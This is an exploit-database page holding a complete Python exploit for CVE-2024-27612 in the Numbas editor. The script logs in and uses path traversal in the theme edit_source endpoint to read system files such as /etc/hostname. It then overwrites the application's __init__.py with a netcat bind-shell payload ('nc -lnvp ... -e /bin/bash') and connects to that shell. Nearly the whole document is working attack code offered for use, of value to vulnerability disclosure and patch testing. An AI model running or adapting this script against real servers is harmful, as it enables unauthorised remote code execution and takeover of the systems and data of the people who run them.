Numbas < v7.3 remote code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-03-10 | Type : webapps | Platform : nodejs


[+] Code ...

# Exploit Title: Numbas < v7.3 - Remote Code Execution
# Google Dork: N/A
# Date: March 7th, 2024
# Exploit Author: Matheus Boschetti
# Vendor Homepage: https://www.numbas.org.uk/
# Software Link: https://github.com/numbas/Numbas
# Version: 7.2 and below
# Tested on: Linux
# CVE: CVE-2024-27612

import sys, requests, re, argparse, subprocess, time
from bs4 import BeautifulSoup

s = requests.session()

def getCSRF(target):
url = f"http://{target}/"
req = s.get(url)
soup = BeautifulSoup(req.text, 'html.parser')
csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
return csrfmiddlewaretoken

def createTheme(target):
# Format request
csrfmiddlewaretoken = getCSRF(target)
theme = 'ExampleTheme'
boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'
data = (
f'--{boundary}\r\n'
'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'
'\r\n'
f'{csrfmiddlewaretoken}\r\n'
f'--{boundary}\r\n'
'Content-Disposition: form-data; name="name"\r\n'
'\r\n'
f'{theme}\r\n'
f'--{boundary}--\r\n'
)
headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',
'User-Agent': 'Mozilla/5.0',
'Accept': '*/*',
'Connection': 'close'}

# Create theme and return its ID
req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)
redir = req.url
split = redir.split('/')
id = split[4]
print(f"\t[i] Theme created with ID {id}")
return id

def login(target, user, passwd):
print("\n[i] Attempting to login...")

csrfmiddlewaretoken = getCSRF(target)
data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
'username': user,
'password': passwd,
'next': '/'}

# Login
login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)
res = login.text
if("Logged in as" not in res):
print("\n\n[!] Login failed!")
sys.exit(-1)

# Check if logged and fetch ID
usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)
if usermatch:
user = usermatch.group(1)
idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)
if idmatch:
id = idmatch.group(1)
print(f"\t[+] Logged in as \"{user}\" with ID {id}")

def checkVuln(url):
print("[i] Checking if target is vulnerable...")

# Attempt to read files
themeID = createTheme(url)
target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."
hname = s.get(f"{target}/etc/hostname")
ver = s.get(f"{target}/etc/issue")
hnamesoup = BeautifulSoup(hname.text, 'html.parser')
versoup = BeautifulSoup(ver.text, 'html.parser')
hostname = hnamesoup.find('textarea').get_text().strip()
version = versoup.find('textarea').get_text().strip()
if len(hostname) < 1:
print("\n\n[!] Something went wrong - target might not be vulnerable.")
sys.exit(-1)
print(f"\n[+] Target \"{hostname}\" is vulnerable!")
print(f"\t[i] Running: \"{version}\"")

# Cleanup - delete theme
print(f"\t\t[i] Cleanup: deleting theme {themeID}...")
target = f"http://{url}/themes/{themeID}/delete"
csrfmiddlewaretoken = getCSRF(url)
data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}
s.post(target, data=data)


def replaceInit(target):
# Overwrite __init__.py with arbitrary code
rport = '8443'
payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"
csrfmiddlewaretoken = getCSRF(target)
filename = '../../../../numbas_editor/numbas/__init__.py'
themeID = createTheme(target)
data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
'source': payload,
'filename': filename}

print("[i] Delivering payload...")
# Retry 5 times in case something goes wrong...
for attempt in range(5):
try:
s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)
except Exception as e:
pass

# Establish connection to bind shell
time.sleep(2)
print(f"\t[+] Payload delivered, establishing connection...\n")
if ":" in target:
split = target.split(":")
ip = split[0]
else:
ip = str(target)
subprocess.Popen(["nc", "-n", ip, rport])
while True:
pass


def main():
parser = argparse.ArgumentParser()
if len(sys.argv) <= 1:
print("\n[!] No option provided!")
print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")
print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")
sys.exit(-1)

group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')
parser.add_argument('--target', help='Target IP:PORT')
parser.add_argument('--user', help='Username to authenticate')
parser.add_argument('--passwd', help='Password to authenticate')
args = parser.parse_args()
action = args.action
target = args.target
user = args.user
passwd = args.passwd

print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")

if action == 'check':
login(target, user, passwd)
checkVuln(target)
elif action == 'exploit':
login(target, user, passwd)
replaceInit(target)
else:
sys.exit(-1)


if __name__ == "__main__":
main()